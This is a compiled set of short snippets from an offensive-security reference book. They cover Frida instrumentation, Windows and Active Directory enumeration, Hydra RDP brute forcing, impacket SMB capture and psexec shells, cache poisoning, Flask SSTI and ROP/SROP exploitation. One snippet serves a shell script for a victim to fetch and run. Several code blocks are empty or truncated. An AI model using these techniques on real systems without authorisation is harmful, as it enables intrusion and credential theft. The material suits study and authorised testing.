### Install Frida Python Client Source: https://book.jorianwoltjer.com/mobile/frida Installs the Frida client-side library, which provides command-line tools like frida, frida-ps, and frida-trace. This is a prerequisite for interacting with the Frida server from your host system. ```bash pip install frida ``` -------------------------------- ### Attacker Setup for Shell Download Source: https://book.jorianwoltjer.com/linux/hacking-linux-boxes Demonstrates the attacker's side for downloading a shell script. It involves creating a directory, creating a shell script (e.g., index.html for wget), and starting an HTTP server to serve the file. The victim then downloads and executes this script. ```shell-session $ mkdir http $ nano http/shell.sh # Can be index.html to do just `wget $YOUR_IP` on the victim $ default listen http http ``` -------------------------------- ### PowerShell: Manage Windows Services Source: https://book.jorianwoltjer.com/windows/local-enumeration This snippet provides commands to list all Windows services with their name, state, and path. It also includes examples for stopping and starting a service using the 'net' command, assuming the user has the necessary permissions and the service name is defined in a variable. ```powershell # List all services Get-CimInstance -ClassName win32_service | Select Name,State,PathName # Start/stop a service if you are allowed net stop $SERVICE_NAME net start $SERVICE_NAME ``` -------------------------------- ### Redis MONITOR Command Example Source: https://book.jorianwoltjer.com/networking/redis-valkey-tcp-6379 The MONITOR command in Redis displays all incoming requests to the Redis server in real-time. This snippet shows example output including SELECT, RESTORE, and GET commands, useful for observing data flow and confirming successful data transfer. ```redis > MONITOR 1694377609.839835 [0 127.0.0.1:60688] "SELECT" "0" 1694377609.839844 [0 127.0.0.1:60688] "RESTORE" "key1" "0" "\x00\x04test\x0b\x00\xe8O\x12\xd3\x91nY\xcc" > GET key1 "test" ``` -------------------------------- ### Windows 8.3 Filename Example Source: https://book.jorianwoltjer.com/web/server-side/arbitrary-file-write Demonstrates the use of the 'dir /x' command in PowerShell to view and interact with 8.3 filenames on Windows. This example shows creating a file and then accessing its shortened name. ```powershell C:\Windows\Tasks> echo test > some-super-long-filename.txt C:\Windows\Tasks> dir /x ... 00-00-2025 00:00 8 SOME-S~1.TXT some-super-long-filename.txt C:\Windows\Tasks> type SOME-S~1.TXT test ``` -------------------------------- ### Install Z3 Solver Source: https://book.jorianwoltjer.com/cryptography/custom-ciphers/z3-solver This command installs the Z3 Theorem Prover Python library using pip. Ensure you have Python and pip installed before running this command. ```shell pip install z3-solver ``` -------------------------------- ### Grep Simple Example Source: https://book.jorianwoltjer.com/forensics/grep A straightforward example showing how to search for the word 'something' within a file named 'file.txt' and display the matching line. ```shell-session $ grep something file.txt And here is something. ``` -------------------------------- ### Install Socket.IO and Express Dependencies Source: https://book.jorianwoltjer.com/web/client-side/websockets Installs the necessary packages for running a Socket.IO server with Express. This command is executed in a Node.js environment. ```sh npm install socket.io express ``` -------------------------------- ### Hydra RDP Brute Force Example Source: https://book.jorianwoltjer.com/windows/scanning-spraying Provides a basic example of how to use Hydra to brute-force RDP credentials. This command attempts to use a static username and password against a list of IP addresses. ```bash hydra -l $USERNAME -p $PASSWORD -M ips.txt rdp # Try password on all IPs (RDP) ``` -------------------------------- ### Setting up an SMB Server with impacket Source: https://book.jorianwoltjer.com/web/server-side/arbitrary-file-write Provides a command to set up a basic SMB server using the `smbserver.py` script from the impacket suite. This server listens for incoming connections and can be used to capture authentication details, including usernames, from clients attempting to connect. ```sh cd $(mktemp -d) sudo smbserver.py -smb2support -ip 0.0.0.0 share . ``` -------------------------------- ### Start BloodHound CE with Docker Source: https://book.jorianwoltjer.com/windows/active-directory-privilege-escalation This command uses curl to download and pipe the BloodHound CE setup script to docker compose, starting the necessary containers. It exposes the BloodHound interface on port 3000. Ensure Docker is installed and running. ```bash curl -L https://ghst.ly/getbhce | BLOODHOUND_PORT=3000 docker compose -f - up ``` -------------------------------- ### Import Pwntools and Manage Processes/ELF Binaries Source: https://book.jorianwoltjer.com/binary-exploitation/pwntools This Python code demonstrates how to import the Pwntools library and initialize connections to local processes or remote hosts. It also shows how to load ELF binaries and configure the context for exploit development. ```python from pwn import * # Run a local binary p = process("./binary") # Connect to a remote host using TCP (same as `$ nc 10.10.10.10 1337`) p = remote("10.10.10.10", 1337) # Load an ELF binary libc = ELF("./libc.so.6") libc = ELF("./libc.so.6", checksec=False) # Disable the default `checksec` on import # Load a binary, and then create a process from it context.binary = elf = ELF("./binary") p = process() p = process(aslr=False) # You can also disable ASLR here ``` -------------------------------- ### Get Root Access on Android Source: https://book.jorianwoltjer.com/mobile/frida Obtains root privileges on the connected Android device using ADB. This is often required to run the Frida server without permission errors. ```bash adb root ``` -------------------------------- ### Run Frida Script from Command Line Source: https://book.jorianwoltjer.com/mobile/frida Execute a JavaScript script with Frida from the command line. This command starts an application and attaches the specified script on launch. Options include connecting to a USB device (-U), starting a specific app (-f), and loading a script (-l). ```bash frida -U -f com.example.app -l script.js ``` -------------------------------- ### Socket.IO Client Setup (JavaScript) Source: https://book.jorianwoltjer.com/web/client-side/websockets Demonstrates how to include the Socket.IO client library in a web page, either via a script tag or as an ES module. This is essential for browser-based clients to connect to a Socket.IO server. ```html ``` -------------------------------- ### Docker Compose Configuration for VSCode Dev Containers Source: https://book.jorianwoltjer.com/languages/python This docker-compose.yml file is used to define a service for building a web application from the current directory and exposing port 5000. It's a minimal example to get started with VSCode Dev Containers when you have a Dockerfile but no docker-compose.yml. ```yaml services: web: build: . ports: - "5000:5000" ``` -------------------------------- ### Start Neo4j Database Console Source: https://book.jorianwoltjer.com/windows/active-directory-privilege-escalation This command starts the Neo4j graph database server using the 'console' command. Neo4j is a component required for BloodHound to store and analyze Active Directory data. Ensure Neo4j is installed. ```bash sudo neo4j console ``` -------------------------------- ### WebSocket Connection Setup Source: https://book.jorianwoltjer.com/web/server-side/reverse-proxies This outlines the typical steps involved in establishing a WebSocket connection between a client and a backend server, including the necessary HTTP headers and proxy behavior. It explains how a successful WebSocket upgrade (101 Switching Protocols) leads the proxy to forward raw TCP data. ```text 1. *Client* sends an HTTP GET request with `Upgrade: websocket`, `Sec-WebSocket-Version: 13` and `Sec-WebSocket-Key: ` headers 2. *Proxy* forwards this request to the backend 3. *Backend* implements websockets for the requested endpoint, so it returns a `101` status code with a `Sec-WebSocket-Accept:` header derived from the nonce 4. *Proxy* recognizes the status code and sees it is a successful WebSocket connection, so it switches the state of this TCP connection to allow binary data passthrough 5. *Client* and *Backend* can now **directly communicate** over WebSocket frames ``` -------------------------------- ### Cache Resources Instantly with window.open() and bfcache Source: https://book.jorianwoltjer.com/web/client-side/caching This script demonstrates how to use `window.open()` to load resources uncached and then quickly navigate the opened window back to a page that triggers bfcache, falling back to disk cache for instantaneous loading. It's useful for exploiting gadgets that rely on DOM manipulation. ```html "], { type: "text/html" }) setTimeout(() => { w.location = URL.createObjectURL(blob); }, 3500); } ``` -------------------------------- ### Start Android Emulator with Writable System Partition Source: https://book.jorianwoltjer.com/mobile/http-s-proxy-for-android This command starts an Android Virtual Device (AVD) with the '-writable-system' flag. This flag allows modifications to the system partition, which is necessary for permanently installing CA certificates. ```shell-session $ emulator -avd PixelXL27 -writable-system ``` -------------------------------- ### Substitution Cipher Solver (Shell Session) Source: https://book.jorianwoltjer.com/cryptography/ciphers Demonstrates the usage of a command-line tool 'sub-solver' for cracking substitution ciphers. The example shows the command to run the solver with a given ciphertext and displays the output, including potential solutions and the execution time. ```shell $ time ./target/release/sub-solver -s "Tcxd dlzhrtm edbe ec tmcpfitd xs ecch rl ifercl" [*] Using empty starting key [*] Using built-in english wordlist [+] Loaded 13255 unique patterns [+] Saved dictionary cache [*] Input string: "Tcxd dlzhrtm edbe ec tmcpfitd xs ecch rl ifercl" [+] Parsed 9 input words [+] Pruned impossible words [*] Starting to find solutions... ?xoetc?la??nh??w?iys???m?g -> some english text to showcase my tool in action ?xoetc?la??nh??w?irs???m?g -> some english text to showcase mr tool in action ?xoetc?la??nh??w?ius???m?g -> some english text to showcase mu tool in action [+] Finished! (3 solutions) real 0m0.117s ``` -------------------------------- ### Solidity Compiler Version Error Example Source: https://book.jorianwoltjer.com/cryptography/blockchain/smart-contracts Illustrates a common ParserError in Solidity when the contract requires a different compiler version than the one currently installed. The example shows how to identify the required version and adjust the pragma statement in the source file. ```solidity Setup.sol:1:1: ParserError: Source file requires different compiler version (current compiler is 0.7.3+commit.9bfce1f6.Emscripten.clang) - note that nightly builds are considered to be strictly less than the released version ``` ```diff - pragma solidity ^0.8.18; + pragma solidity ^0.7.3; ``` -------------------------------- ### Install Xdebug using PECL in Docker Source: https://book.jorianwoltjer.com/languages/php This Dockerfile snippet installs the Xdebug extension using PECL, configures it for debugging mode, and ensures it starts with every request. It's a streamlined approach for environments where PECL is available. ```docker RUN yes | pecl install xdebug && \ echo "zend_extension=xdebug.so" > /usr/local/etc/php/conf.d/xdebug.ini && \ echo "xdebug.mode=debug" >> /usr/local/etc/php/conf.d/xdebug.ini && \ echo "xdebug.start_with_request=yes" >> /usr/local/etc/php/conf.d/xdebug.ini ``` -------------------------------- ### Analyze Binary with rabin2 CLI Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop Provides an example of using the `rabin2` CLI tool from the radare2 framework to analyze a binary. It lists common options for extracting information such as functions, strings, symbols, and sections. ```shell $ rabin2 [OPTIONS...] ./binary * -i: Show functions * -z: Show strings in .data section * -s: Show all symbols * -S: Show sections (with addresses) ``` -------------------------------- ### Set up SMB Listener with Impacket Source: https://book.jorianwoltjer.com/windows/active-directory-privilege-escalation Starts an SMB server to receive dumped registry hives. It listens on all interfaces and writes files to the local 'share/' directory. This is a prerequisite for the BackupOperatorToDA tool. ```bash sudo smbserver.py -smb2support -ip 0.0.0.0 share . ``` -------------------------------- ### Apache CouchDB Regex Extraction Source: https://book.jorianwoltjer.com/web/server-side/nosql-injection Extracts information using regex in Apache CouchDB. This example uses the '$regex' operator to match passwords starting with 'a'. ```json { "username": "admin", "password": { "$regex": "^a" } } ``` -------------------------------- ### Configure Seccomp Blocklist (C) Source: https://book.jorianwoltjer.com/binary-exploitation/sandboxes-chroot-seccomp-and-namespaces Shows a basic C example of configuring seccomp to create a blocklist. It initializes seccomp to kill the process on any syscall, then explicitly allows 'read' and 'write' syscalls before loading the filter. ```c scmp_filter_ctx ctx; // define context variable to set up rules // Kill the program on any syscall ctx = seccomp_init(SCMP_ACT_KILL); // ... except read (allow) seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0) == 0); // ... except write (allow) seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0) == 0); // load the context, rules are applied from now on seccomp_load(ctx) == 0); ``` -------------------------------- ### Basic PHP XSS Vulnerability Example Source: https://book.jorianwoltjer.com/web/client-side/cross-site-scripting-xss Demonstrates a simple PHP script that reflects user input directly into the HTML response without proper sanitization, making it vulnerable to XSS attacks. This example highlights how user-supplied data in a GET parameter can be exploited. ```php ``` -------------------------------- ### Hashcat: Apply Rules to Wordlist for Password Generation Source: https://book.jorianwoltjer.com/cryptography/hashing/cracking-hashes Demonstrates using Hashcat with the `--stdout` flag to apply rules to a wordlist and generate potential passwords without actual cracking. This is useful for testing rule effectiveness. It shows examples of single-rule appending and multi-rule application using `.rule` files. ```shell-session $ cat list.txt password secret root $ hashcat --stdout -a 0 -j 'u$1$2$3' list.txt PASSWORD123 SECRET123 ROOT123 ``` ```shell-session $ cat case.rule l u $ cat 123.rule $1 $2 $3 $ hashcat --stdout -r case.rule -r 123.rule list.txt password1 PASSWORD1 password2 PASSWORD2 password3 PASSWORD3 secret1 SECRET1 secret2 SECRET2 secret3 SECRET3 root1 ROOT1 root2 ROOT2 root3 ROOT3 ``` -------------------------------- ### Connect to SMB Shares with smbclient Source: https://book.jorianwoltjer.com/windows/scanning-spraying Connect to an SMB share using 'smbclient' with provided credentials. This allows for file system traversal and file operations like listing, getting, and putting files. ```bash smbclient -L //10.10.10.10 -U $USERNAME --password $PASSWORD ``` ```bash smbclient //10.10.10.10/share -U $USERNAME --password $PASSWORD ``` ```bash smbclient //10.10.10.10/share -U $USERNAME --pw-nt-hash $NTLM_HASH ``` -------------------------------- ### Cache Poisoning Request Example Source: https://book.jorianwoltjer.com/web/client-side/caching Illustrates a malicious HTTP GET request designed to exploit cache poisoning by manipulating the URL path, potentially leading to the retrieval of an attacker-controlled script. ```http GET /static/main.js#/../../uploads/attacker.js HTTP/1.1 ``` -------------------------------- ### Dump Certificates and SSL Keys with Volatility 2 and 3 Source: https://book.jorianwoltjer.com/forensics/memory-dumps-volatility This section demonstrates how to dump certificates and SSL keys from a memory image using Volatility 2 and Volatility 3. Volatility 2 offers options like --pid, --name, and --ssl, while Volatility 3 uses a specific plugin. ```shell # Interesting options for this module are: --pid, --name, --ssl vol2 -f file.dmp --profile=PROFILE dumpcerts --dump-dir=dumpcerts # Dump certificates ``` ```shell vol3 -f file.dmp windows.registry.certificates.Certificates # Dump certificates ``` -------------------------------- ### Trace Specific Application with Frida Source: https://book.jorianwoltjer.com/mobile/frida Attaches Frida to a specific application identified by its package name and begins tracing its functions. The '-U' flag is crucial for targeting the Android device. ```bash frida-trace -U -N com.android.chrome ``` -------------------------------- ### Trace Foreground Application with Frida Source: https://book.jorianwoltjer.com/mobile/frida Automatically attaches Frida to the application currently in the foreground on the Android device. This is a convenient shortcut for tracing the active app without needing its package name. ```bash frida-trace -U -F ``` -------------------------------- ### Execute Program via Syscall (64-bit) Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop Demonstrates how to execute a program using the `syscall` instruction on a 64-bit architecture. It specifically shows the setup for the `execve` system call, which requires the syscall number in `rax` and arguments in `rdi`, `rsi`, and `rdx`. This method is crucial for process execution in low-level programming. ```nasm mov rax, 0x3b ; set rax to the syscall number for execve() mov rdi, filename ; set rdi to the address of the filename string mov rsi, argv ; set rsi to the address of the argument values array mov rdx, envp ; set rdx to the address of the environment variables array syscall ; invoke the syscall ``` -------------------------------- ### Initialize and Commit in Git Source: https://book.jorianwoltjer.com/forensics/git Demonstrates the basic Git commands to initialize a repository and create a commit with a message. These are fundamental operations for version control. ```shell git init git commit -m "Initial commit" ``` -------------------------------- ### List Processes on Android with Frida Source: https://book.jorianwoltjer.com/mobile/frida Lists all running processes on the connected Android device that Frida can attach to. The '-U' flag ensures the command targets the device via the Android bridge. ```shell-session $ frida-ps -Ua PID Name Identifier ---- ----------- ---------------------------------------  5852 Chrome      com.android.chrome 1861 Google     com.google.android.googlequicksearchbox 1861 Google     com.google.android.googlequicksearchbox 1694 Messages  com.google.android.apps.messaging 1053 SIM Toolkit com.android.stk 1056 Settings  com.android.settings ``` -------------------------------- ### Push and Run Frida Server on Android Source: https://book.jorianwoltjer.com/mobile/frida This sequence of commands pushes the Frida server binary to a temporary directory on the Android device, makes it executable, and then runs it. Ensure the device is rooted for the server to function correctly. ```bash adb push frida-server-*-android-x86_64 /data/local/tmp/frida-server ``` ```bash adb shell chmod +x /data/local/tmp/frida-server ``` ```bash adb shell /data/local/tmp/frida-server ``` -------------------------------- ### HTML Template Example with Caddy Source: https://book.jorianwoltjer.com/web/server-side/reverse-proxies An example of an HTML file that uses Go's `text/template` syntax to display request information, such as the User-Agent. This file would be served by Caddy when the `templates` directive is enabled. ```html

Your UA is: {{.Req.Header.Get "User-Agent"}}

``` -------------------------------- ### Example Vulnerable PHP Code Source: https://book.jorianwoltjer.com/languages/php A common LFI vulnerability pattern in PHP where user input from the 'page' GET parameter is directly appended with '.php' and included. This is exploitable by chaining PHP filters. ```php ``` -------------------------------- ### Generate and Verify MD5 Collisions using HashClash Source: https://book.jorianwoltjer.com/cryptography/hashing This snippet demonstrates the command-line process for generating MD5 identical prefix collisions using the HashClash tool and Python. It includes steps for creating a prefix file, running the collision script, and verifying the MD5 sums of the original and modified collision files. This showcases the practical application of HashClash for creating MD5 collisions. ```shell-session $ python3 -c 'print("A"*64 + "B"*64 + "C"*64 + "test", end="")' > prefix # Create prefix $ ../scripts/poc_no.sh prefix # Do collision (takes a few minutes) ... $ md5sum collision*.bin # MD5 sums are the same a83232a6730cdd6102d002e31ffd1c3f collision1.bin a83232a6730cdd6102d002e31ffd1c3f collision2.bin # # Append data to collisions $ cat collision1.bin <(python3 -c 'print("D"*64 + "E"*64 + "F"*64, end="")') > collision1_extra.bin $ cat collision2.bin <(python3 -c 'print("D"*64 + "E"*64 + "F"*64, end="")') > collision2_extra.bin $ md5sum collision*_extra.bin # MD5 sums still match e8842904b573ed3cd545a5b116f70af8 collision1_extra.bin e8842904b573ed3cd545a5b116f70af8 collision2_extra.bin ``` -------------------------------- ### List SMB Shares Source: https://book.jorianwoltjer.com/windows/local-enumeration Lists all available SMB shares on a remote machine (dc01 in this example) using the 'net view' command with the '/all' flag. This helps in discovering accessible network resources. ```powershell net view \dc01 /all ``` -------------------------------- ### Bypass SSL Pinning with Frida Script Source: https://book.jorianwoltjer.com/mobile/frida A Frida script designed to bypass SSL pinning and root detection in Android applications. This script overrides built-in certificate verification methods, allowing for normal HTTPS debugging. ```javascript // Frida Root Detection and SSL Pinning Bypass script by @ahrixia // (Content not provided in the input, refer to the embed URL for details) ``` -------------------------------- ### Search ROP Gadgets with Ropper CLI Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop Demonstrates how to use the Ropper CLI tool to search for specific ROP gadgets within a binary. It shows how to search for gadgets containing a particular instruction, like 'xor', and how to pipe the output to grep for more flexible filtering. ```shell $ ropper -f ./binary --search 'xor' [INFO] Searching for gadgets: xor [INFO] File: ./badchars 0x0000000000400628: xor byte ptr [r15], r14b; ret; 0x0000000000400629: xor byte ptr [rdi], dh; ret; ``` ```shell $ ropper -f ./binary | grep rdi 0x000000000040062d: add byte ptr [rdi], dh; ret; 0x00000000004006a3: pop rdi; ret; 0x0000000000400631: sub byte ptr [rdi], dh; ret; 0x0000000000400629: xor byte ptr [rdi], dh; ret; ``` -------------------------------- ### Run Basic VBA Macro in Word Source: https://book.jorianwoltjer.com/forensics/vba-macros This VBA macro demonstrates a simple 'Hello, world!' message box. It's a basic example to show how to start and run a macro within a Word document using the Visual Basic editor. ```vba Sub main() MsgBox "Hello, world!" End Sub ``` -------------------------------- ### Download CodeQL Query Packs Source: https://book.jorianwoltjer.com/languages/codeql This command downloads a specific pack of CodeQL queries for a given language. It is useful when the default bundle does not include the necessary queries for your project's language. ```bash codeql pack download codeql/python-queries ``` -------------------------------- ### Example iOS Property List XML Structure Source: https://book.jorianwoltjer.com/mobile/ios This XML snippet represents the structure of an iOS property list file after being parsed by 'plistutil'. It shows a common format for storing key-value data, including strings and numbers, within an application. ```xml secret ExampleSecret id 42 title Some Title ``` -------------------------------- ### Get Interactive Shell using psexec.py from Impacket (Bash) Source: https://book.jorianwoltjer.com/windows/lateral-movement Provides an example of using the psexec.py script from the Impacket suite to obtain an interactive shell on a remote Windows machine via SMB. This method also typically grants 'nt authority\system' privileges. ```shell-session $ psexec.py '$USERNAME:$PASSWORD@$IP' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Requesting shares on $IP..... [*] Found writable share ADMIN$ [*] Uploading file YUqMJypj.exe [*] Opening SVCManager on $IP..... [*] Creating service yddV on $IP..... [*] Starting service yddV..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.20348.169] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ``` -------------------------------- ### Iframe Navigation Example Source: https://book.jorianwoltjer.com/web/client-side/caching Demonstrates navigating away from a page containing an iframe, illustrating how policy containers like CSP are retained. ```html Navigate away ``` -------------------------------- ### Read Query Parameters in Flask Jinja2 SSTI Source: https://book.jorianwoltjer.com/web/frameworks/flask This Jinja2 expression allows reading values from query parameters in Flask. It's useful when direct command execution is difficult and you need to pass data via GET requests, for example, to construct a payload. ```django {{request|attr("args")|attr("get")("a")}} ``` -------------------------------- ### Find and Filter Linux Capabilities Source: https://book.jorianwoltjer.com/linux/linux-privilege-escalation/filesystem-permissions Demonstrates how to find files with specific capabilities assigned using the `getcap` command. It shows how to recursively search the entire filesystem (`-r /`) and filter the output to find specific capabilities like `cap_setuid`. ```shell getcap -r / 2>/dev/null ``` ```bash getcap -r / 2>/dev/null | grep cap_setuid ``` -------------------------------- ### Constructing Initial ROP Chain for sigreturn Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop/sigreturn-oriented-programming-srop Shows how to build the first part of a ROP chain using PwnTools to set the RAX register to 15 and then call the 'syscall' gadget. This prepares the stack for the sigreturn syscall. ```python rop = ROP(elf) rop.rax = 15 # Let PwnTools find a `pop rax; ret` gadget and use it rop.call(SYSCALL) # Jump to syscall at `ret` payload = flat({ OFFSET: rop.chain() }) ``` -------------------------------- ### Kubernetes Cluster Interaction using kubectl (Shell Session) Source: https://book.jorianwoltjer.com/cloud/kubernetes Provides examples of using the kubectl command-line tool to interact with a Kubernetes cluster, including listing all resources, pods, secrets, executing commands in pods, and decoding secrets. Requires kubectl installed and configured. ```shell-session # # List everything $ kubectl get all --token $TOKEN --server $API_SERVER --insecure-skip-tls-verify $ kubectl get pods # List pods $ kubectl get secrets # List secrets # # Execute an interactive shell with a pod $ kubectl exec <POD_NAME> --stdin --tty -- /bin/bash # # Get and decode a secret $ kubectl get secret <SECRET_NAME> -o jsonpath='{.data.*}' | base64 -d ``` -------------------------------- ### 32-bit Syscall Example using int 0x80 (Assembly) Source: https://book.jorianwoltjer.com/binary-exploitation/sandboxes-chroot-seccomp-and-namespaces This assembly code demonstrates how to use 32-bit syscalls via the `int 0x80` instruction. It opens a file named 'flag' and then uses `sendfile` to read its contents to standard output. This is an example of exploiting a scenario where 32-bit syscalls are enabled. ```asmatmel mov eax, 5 lea ebx, [rip+flag] mov ecx, 0 int 0x80 ; open("flag", O_RDONLY) mov ecx, eax ; return value (fd) mov eax, 187 mov ebx, 1 ; STDOUT mov edx, 0 mov esi, 100 int 0x80 ; sendfile(STDOUT, flag_fd, 0, 100) flag: .string "flag" ```